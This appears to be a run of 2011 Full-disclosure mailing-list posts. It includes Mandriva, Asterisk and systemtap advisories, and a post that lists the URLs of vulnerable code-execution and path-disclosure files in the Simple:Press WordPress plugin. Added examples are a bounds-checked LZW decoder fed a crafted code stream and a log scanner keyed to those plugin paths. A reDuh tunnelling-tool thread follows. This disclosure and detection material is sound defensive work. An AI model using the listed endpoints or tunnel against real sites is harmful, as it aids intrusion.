dcd75b98bf6482c3134374fba85ef8d5  2010.1/i586/libxfont1-static-devel-1.4.1-1.1mdv2010.2.i586.rpm
071b839b9b387da16dbe28647169cdc6  2010.1/SRPMS/libxfont-1.4.1-1.1mdv2010.2.src.rpm

Mandriva Linux 2010.1/X86_64:
ac85e7c0a994216ab4b01eaf068e7ed9  2010.1/x86_64/lib64xfont1-1.4.1-1.1mdv2010.2.x86_64.rpm
be2ecb351d2af84eed831d4e4a8546cc  2010.1/x86_64/lib64xfont1-devel-1.4.1-1.1mdv2010.2.x86_64.rpm
12e8118fdefdb42aad4d8939da3ecdd5  2010.1/x86_64/lib64xfont1-static-devel-1.4.1-1.1mdv2010.2.x86_64.rpm
071b839b9b387da16dbe28647169cdc6  2010.1/SRPMS/libxfont-1.4.1-1.1mdv2010.2.src.rpm

Mandriva Linux 2011:
f0eb57ae377b67104ffd242ba2392fce  2011/i586/libxfont1-1.4.3-2.1-mdv2011.0.i586.rpm
6bfd3df3c8d48f791727eec9fda3291c  2011/i586/libxfont1-devel-1.4.3-2.1-mdv2011.0.i586.rpm
d30dd3a4409786fdc28fe7a80321b931  2011/i586/libxfont1-static-devel-1.4.3-2.1-mdv2011.0.i586.rpm
c0e1e359377d217e69f241e922bb3b0f  2011/SRPMS/libxfont-1.4.3-2.1.src.rpm

Mandriva Linux 2011/X86_64:
f1fd069f313ad2663a40b8ecab7fac18  2011/x86_64/lib64xfont1-1.4.3-2.1-mdv2011.0.x86_64.rpm
c88a0f7e76b85c298691f94f3b47e343  2011/x86_64/lib64xfont1-devel-1.4.3-2.1-mdv2011.0.x86_64.rpm
dd21bf4f4d2249dfcadecfa9e5b6fe27  2011/x86_64/lib64xfont1-static-devel-1.4.3-2.1-mdv2011.0.x86_64.rpm
c0e1e359377d217e69f241e922bb3b0f  2011/SRPMS/libxfont-1.4.3-2.1.src.rpm

Mandriva Enterprise Server 5:
c771ee56c18d549596da16a5702b4eec  mes5/i586/libxfont1-1.3.3-1.1mdvmes5.2.i586.rpm
fd789a0970d76b2ebb65d80b0bd7644f  mes5/i586/libxfont1-devel-1.3.3-1.1mdvmes5.2.i586.rpm
9b2dc8eca6bfb18747c3e245c93e3e66  mes5/i586/libxfont1-static-devel-1.3.3-1.1mdvmes5.2.i586.rpm
ba3875d325e737d7f1bf9c5bb2c23bb3  mes5/SRPMS/libxfont-1.3.3-1.1mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64:
4f8d8287abfa8fba3bdc2b0046784a93  mes5/x86_64/lib64xfont1-1.3.3-1.1mdvmes5.2.x86_64.rpm
3c83c6510a09fa870cd04cf28ad172c9  mes5/x86_64/lib64xfont1-devel-1.3.3-1.1mdvmes5.2.x86_64.rpm
f5a6a43b2a538ff55a517321c0b09391  mes5/x86_64/lib64xfont1-static-devel-1.3.3-1.1mdvmes5.2.x86_64.rpm
ba3875d325e737d7f1bf9c5bb2c23bb3  mes5/SRPMS/libxfont-1.3.3-1.1mdvmes5.2.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
     <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFOnDB4mqjQ0CJFipgRAqNoAKDIbrW9UpQHZoiA4fN/Woh9lCgrEwCg0vAJ
tmgY1uRlLS9/q+ma2hmCV7k=
=IBKG
-----END PGP SIGNATURE-----
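The check that CVE-2011-2895 describes as missing, a code word that is not in the decompression table, shown in a small LZW coder. This is an added example, not libXfont's fontfile/decompress.c or BSD compress; it also illustrates the bug class in the ncompress advisory MDVSA-2011:152 above (an out-of-range code used as an array index). Codes are kept as a Python list of ints rather than a packed variable-width bit stream, and the CLEAR code and 12-bit table limit of compress(1) are left out so the table handling stays visible.

```python
"""LZW decoding with the missing-code-word check named in MDVSA-2011:153.

Added example, not libXfont's fontfile/decompress.c or BSD compress: codes are kept as a
Python list of ints rather than a packed variable-width bit stream, and the CLEAR code and
the 12-bit table limit of compress(1) are left out so the table logic stays visible.
"""
ALPHABET = 256  # single-byte literals occupy codes 0..255


def lzw_compress(data: bytes) -> list:
    """Reference encoder, so test streams can be produced from real input."""
    table = {bytes([i]): i for i in range(ALPHABET)}
    out, w = [], b""
    for byte in data:
        wc = w + bytes([byte])
        if wc in table:
            w = wc
        else:
            out.append(table[w])
            table[wc] = len(table)  # next free code
            w = bytes([byte])
    if w:
        out.append(table[w])
    return out


def lzw_decompress(codes: list) -> bytes:
    """Decoder that rejects any code word the table cannot account for.

    A valid code is either already in the table or exactly the next code to be
    assigned (the KwKwK case, where the entry is w + w[0]). Anything else is a
    corrupt or hostile stream; indexing the table with it, or looping until it
    appears, is the failure mode the advisory describes.
    """
    if not codes:
        return b""
    table = [bytes([i]) for i in range(ALPHABET)]
    prev = codes[0]
    if not 0 <= prev < len(table):
        raise ValueError(f"first code {prev} is not a literal")
    out = bytearray(table[prev])
    for code in codes[1:]:
        if 0 <= code < len(table):
            entry = table[code]
        elif code == len(table):
            entry = table[prev] + table[prev][:1]  # KwKwK: defined by this very step
        else:
            raise ValueError(f"code {code} absent from table of size {len(table)}")
        out += entry
        table.append(table[prev] + entry[:1])
        prev = code
    return bytes(out)


def is_valid_stream(codes: list) -> bool:
    """True if the stream decodes, False if the decoder rejects it."""
    try:
        lzw_decompress(codes)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    sample = b"TOBEORNOTTOBEORTOBEORNOT"
    codes = lzw_compress(sample)
    print(codes)
    print(lzw_decompress(codes) == sample)
    print("crafted stream accepted:", is_valid_stream([ord("T"), 300]))
```

The crafted stream `[84, 300]` is the whole attack surface in miniature: after one literal the table holds 256 entries, so 256 is the only non-literal code the decoder may legitimately see next, and 300 has to be refused rather than looked up. In a real implementation the same test must also cover the table's maximum size, since a stream that keeps adding entries past the code-width limit overruns the table just as surely.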
[Full-disclosure] Disclosures on YouTube (Onaquad Systems Security)
List,

I'll now be putting up my disclosures on YouTube a day or two before they go on full-disclosure. You can visit them here: http://www.youtube.com/user/onaquad under the title "Onaquad Security". Hope you enjoy! I'll probably start posting the src of the code I use there here too. There is already some cool stuff there, tutorials and such, and some unique code. If there is anything there you'd like to have, you can email me about it.

--oxagast
[Full-disclosure] AST-2011-012: Remote crash vulnerability in SIP channel driver
Asterisk Project Security Advisory - AST-2011-012

Product:            Asterisk
Summary:            Remote crash vulnerability in SIP channel driver
Nature of Advisory: Remote crash
Susceptibility:     Remote authenticated sessions
Severity:           Critical
Exploits Known:     No
Reported On:        October 4, 2011
Reported By:        Ehsan Foroughi
Posted On:          October 17, 2011
Last Updated On:    October 17, 2011
Advisory Contact:   Terry Wilson twil...@digium.com
CVE Name:           CVE-2011-4063

Description:
A remote authenticated user can cause a crash with a malformed request due to an uninitialized variable.

Resolution:
Ensure variables are initialized in all cases when parsing the request.

Affected Versions:
Product               Release Series
Asterisk Open Source  1.8.x           All versions
Asterisk Open Source  10.x            All versions (currently in beta)

Corrected In:
Product               Release
Asterisk Open Source  1.8.7.1, 10.0.0-rc1

Patches:
Download URL                                                       Revision
http://downloads.asterisk.org/pub/security/AST-2011-012-1.8.diff   1.8
http://downloads.asterisk.org/pub/security/AST-2011-012-10.diff    10

Links:
Asterisk Project Security Advisories are posted at http://www.asterisk.org/security

This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2011-012.pdf and http://downloads.digium.com/pub/security/AST-2011-012.html

Revision History:
Date  Editor  Revisions Made

Asterisk Project Security Advisory - AST-2011-012
Copyright (c) 2011 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.
[Full-disclosure] [ MDVSA-2011:154 ] systemtap
Mandriva Linux Security Advisory MDVSA-2011:154
http://www.mandriva.com/security/

Package: systemtap
Date: October 17, 2011
Affected: 2010.1

Problem Description:

A vulnerability has been discovered and corrected in systemtap:

SystemTap 1.4 and earlier, when unprivileged (aka stapusr) mode is enabled, allows local users to cause a denial of service (divide-by-zero error and OOPS) via a crafted ELF program with DWARF expressions that are not properly handled by a stap script that performs context variable access (CVE-2011-1769).

The updated packages have been patched to correct this issue.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1769

Updated Packages:

Mandriva Linux 2010.1:
2bd9ea17a67b24a30dc481dee77bf477 2010.1/i586/systemtap-1.2-1.1mdv2010.2.i586.rpm
49fec555976ce70b01e128b0c0909017 2010.1/SRPMS/systemtap-1.2-1.1mdv2010.2.src.rpm

Mandriva Linux 2010.1/X86_64:
d4e8de0f1481e83fa97e4454aa96afb7 2010.1/x86_64/systemtap-1.2-1.1mdv2010.2.x86_64.rpm
49fec555976ce70b01e128b0c0909017 2010.1/SRPMS/systemtap-1.2-1.1mdv2010.2.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] [ MDVSA-2011:155 ] systemtap
Mandriva Linux Security Advisory MDVSA-2011:155
http://www.mandriva.com/security/

Package: systemtap
Date: October 17, 2011
Affected: 2011.

Problem Description:

Multiple vulnerabilities have been discovered and corrected in systemtap:

SystemTap 1.4 and earlier, when unprivileged (aka stapusr) mode is enabled, allows local users to cause a denial of service (divide-by-zero error and OOPS) via a crafted ELF program with DWARF expressions that are not properly handled by a stap script that performs context variable access (CVE-2011-1769).

SystemTap 1.4, when unprivileged (aka stapusr) mode is enabled, allows local users to cause a denial of service (divide-by-zero error and OOPS) via a crafted ELF program with DWARF expressions that are not properly handled by a stap script that performs stack unwinding (aka backtracing) (CVE-2011-1781).

The updated packages have been patched to correct these issues.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1769
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1781

Updated Packages:

Mandriva Linux 2011:
67ba5bb61a22be13c4733ec7a55c69d6 2011/i586/systemtap-1.4-1.1-mdv2011.0.i586.rpm
8111bc0afc62a289f80a7c59c230d534 2011/SRPMS/systemtap-1.4-1.1.src.rpm

Mandriva Linux 2011/X86_64:
ed96532b46d31ccd56e8738685ef9e90 2011/x86_64/systemtap-1.4-1.1-mdv2011.0.x86_64.rpm
8111bc0afc62a289f80a7c59c230d534 2011/SRPMS/systemtap-1.4-1.1.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] Code Execution and FPD vulnerabilities in Simple:Press Forum for WordPress
Hello list!

I want to warn you about multiple security vulnerabilities in the Simple:Press Forum plugin for WordPress. These are Code Execution and Full path disclosure vulnerabilities.

Affected products:

Vulnerable to CE are Simple:Press Forum 4.1.2 and previous versions. In version SPF 4.1.3, which was released on 31.12.2009, TinyBrowser was completely removed (the developers decided not to fix it themselves or wait for a fix from the developer of TinyBrowser, but just removed it). After the removal of TinyBrowser from SPF, new methods of code execution were found in this application, so users of old versions of SPF became even more vulnerable (both on Apache and on IIS web servers).

Vulnerable to FPD are Simple:Press 4.4.5 and previous versions.

Details:

Code Execution (WASC-31):

Execution of arbitrary code is possible via TinyBrowser. As I already said concerning TinyBrowser for TinyMCE (http://lists.grok.org.uk/pipermail/full-disclosure/2011-July/081939.html), the program is vulnerable to three methods of code execution.

http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/tinybrowser.php

Full path disclosure (WASC-13):

http://site/wp-content/plugins/simple-forum/styles/icons/default/ICON_DEFAULTS.php
http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/EnchantSpell.php
http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/GoogleSpell.php
http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/PSpell.php
http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/PSpellShell.php

The last four FPD vulnerabilities are in TinyMCE, which is shipped with SPF. There were many FPD in old versions of SPF; some of them were already fixed in the last version 4.4.5.

Particularly in old versions (such as 4.1.1) there are FPD in the admin folder:

http://site/wp-content/plugins/simple-forum/admin/sfa-framework.php
http://site/wp-content/plugins/simple-forum/admin/sfa-menu.php

And in some other files in subfolders of the admin, editors and other folders. In the last version only the five above-mentioned FPD remain.

Timeline:

2011.02.11 - announced at my site about TinyBrowser.
2011.02.14 - informed the developer of TinyBrowser.
2011.02.17 - the developer of TinyBrowser answered that he had just fixed them in the next version 1.43.
2011.04.07 - announced at my site about Simple:Press Forum.
2011.04.08 - informed the developers of Simple:Press Forum.
2011.07.14 - disclosed at my site about TinyBrowser.
2011.10.15 - disclosed at my site about Simple:Press Forum.

I mentioned these vulnerabilities at my site: http://websecurity.com.ua/5062/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
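As an added example (not part of MustLive's post or of the Simple:Press project), a Python check that flags direct requests to the plugin files listed above in Apache combined-format access logs, so an administrator can see whether those files are being probed on their own install. The log lines are constructed, the IPs are documentation ranges, and the "kind" labels are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Plugin files named in the post: TinyBrowser (code execution) and the files
# that leak the full install path when requested directly. Labels are mine.
SPF = "/wp-content/plugins/simple-forum/"
TINYMCE = SPF + "editors/tinymce/plugins/"
WATCHED = {
    TINYMCE + "tinybrowser/tinybrowser.php": "tinybrowser-rce",
    SPF + "styles/icons/default/ICON_DEFAULTS.php": "fpd",
    TINYMCE + "spellchecker/classes/EnchantSpell.php": "fpd",
    TINYMCE + "spellchecker/classes/GoogleSpell.php": "fpd",
    TINYMCE + "spellchecker/classes/PSpell.php": "fpd",
    TINYMCE + "spellchecker/classes/PSpellShell.php": "fpd",
    SPF + "admin/sfa-framework.php": "fpd-old",   # pre-4.4.5 only
    SPF + "admin/sfa-menu.php": "fpd-old",
}

# Apache "combined" log format; only the fields needed here are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

@dataclass
class Hit:
    ip: str
    ts: str
    path: str
    status: int
    kind: str

def classify(line: str) -> Optional[Hit]:
    # Return a Hit when the request addresses one of the watched files directly.
    m = LOG_RE.match(line)
    if not m:
        return None  # malformed or non-combined line: ignore rather than crash
    # Strip the query string and collapse repeated slashes so "//" variants still match.
    path = re.sub(r"/{2,}", "/", m["target"].split("?", 1)[0])
    kind = WATCHED.get(path)
    return Hit(m["ip"], m["ts"], path, int(m["status"]), kind) if kind else None

def scan(lines: List[str]) -> List[Hit]:
    return [h for h in map(classify, lines) if h is not None]

# Constructed sample lines (not from any real server).
SAMPLE_LOG = [
    '192.0.2.4 - - [15/Oct/2011:10:03:00 +0000] "GET /forum/ HTTP/1.1" 200 8830 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Oct/2011:10:04:02 +0000] "GET ' + TINYMCE + 'tinybrowser/tinybrowser.php?type=image HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Oct/2011:10:05:15 +0000] "GET /wp-content/plugins/simple-forum//editors/tinymce/plugins/spellchecker/classes/GoogleSpell.php HTTP/1.1" 500 412 "-" "curl/7.21.0"',
]
```

Running `scan(SAMPLE_LOG)` yields two hits: the TinyBrowser request and the double-slash GoogleSpell.php request; the ordinary forum page request is ignored.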
Re: [Full-disclosure] About reDuh
Is there any version that supports https?

2009/2/8 seclists <secli...@126.com>:
> Thx for your kind help, bro. The jsp version of reDuh is powerful, so cool.
>
> On 2009-02-08 07:39:41, Haroon Meer <har...@sensepost.com> wrote:
> > Hi..
> >
> > * seclists [secli...@126.com] seemed to say:
> > > Hi, bro
> > > Thx for sharing reDuh. I have downloaded reDuh (asp/php/jsp) and ReDuhClient from http://www.sensepost.com/research/reDuh. Then I have tried it in my vmware; Reduh.jsp can work fine, but ReDuh.aspx can't. I type the command java reDuhClient 192.168.8.102 80 /reDuh.aspx, and it returns an error.
> > >
> > > [Info]Querying remote JSP for usable remote RPC port
> > > [Error] Tried to find a remote RPC port in the range 42000 to 42050 but no attempts were successful. Sorry it didn't work out.
> > >
> > > What is required to let ReDuh.aspx work, please?
> > > My environment: Windows 2003 Enterprise Edition SP2 (Chinese), IIS 6.0, ASP.NET version 2.0.50727
> >
> > I seem to recall this exact error coming up in the past, and having been resolved by i...@sensepost.com. He will send you an email early next week with a little note on how to fix it.
> >
> > Thanks for using it, and please let us know if you have any other questions..
> >
> > Thanks
> > /mh
> > --
> > Haroon Meer, SensePost Information Security | http://www.sensepost.com/blog/
> > PGP: http://www.sensepost.com/pgp/haroon.txt | Tel: +27 83786 6637

--
Ali MEZGANI
Network Engineering/Security
http://www.nativelabs.org/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
So to qualify for a Darwin Award you need a fatally flawed Intelligent Design.

On Mon, Oct 17, 2011 at 3:03 PM, valdis.kletni...@vt.edu wrote:
> On Mon, 17 Oct 2011 03:48:46 EDT, Jeffrey Walton said:
> > Does the Darwin Awards have a category for dumb computer related decisions?
>
> Hmm.. for computer related ones? Good question. The Darwin Awards are for those who remove themselves from the gene pool in *spectacular* ways. They disallow entrants for reasons of mental disease or defect -- so failing to reproduce just because you're a troll living in your parents' basement loses twice - it's commonplace, not spectacular, and it usually isn't a result of a conscious decision you made.
>
> Having said that. I suppose it *is* possible. Consider the (hopefully hypothetical) example of an extreme overclocker who does something predictably stupid and ends up with a lapful of liquid nitrogen and a case of severe frostbite. Gives a whole new meaning to shatter attack ;)
>
> Yeah, *that* would get a Darwin. ;)